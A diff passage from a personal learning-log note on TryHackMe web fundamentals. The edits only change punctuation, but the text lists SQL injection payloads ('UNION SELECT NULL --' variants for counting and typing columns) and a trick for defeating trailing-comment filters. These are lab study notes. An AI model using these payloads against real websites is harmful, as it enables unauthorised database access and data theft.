cardboard-iguana/cardboard-iguana.com/log/2022-01-30-tryhackme-web-fundamentals-and-supplements.md

 * `' UNION SELECT NULL -- `
 * `' UNION SELECT NULL, NULL -- `
 * `' UNION SELECT NULL, NULL, NULL -- `
-* ...and so on until there's an error...
+* …and so on until there's an error…

 A similar approach can be used to detect column types.

 * `' UNION SELECT 'a', NULL, NULL -- `
 * `' UNION SELECT NULL, 'a', NULL -- `
 * `' UNION SELECT NULL, NULL, 'a' -- `
-* ...and so on...
+* …and so on…

 The generalization to other data types is straight-forward.

 Note that sometimes a developer might get "clever" and try to error out on trailing comments.
-If you suspect that's happening, just add something after the trailing ` -- ` -- it's all a comment, after all!
+If you suspect that's happening, just add something after the trailing ` -- ` — it's all a comment, after all!

 Useful MySQL keywords: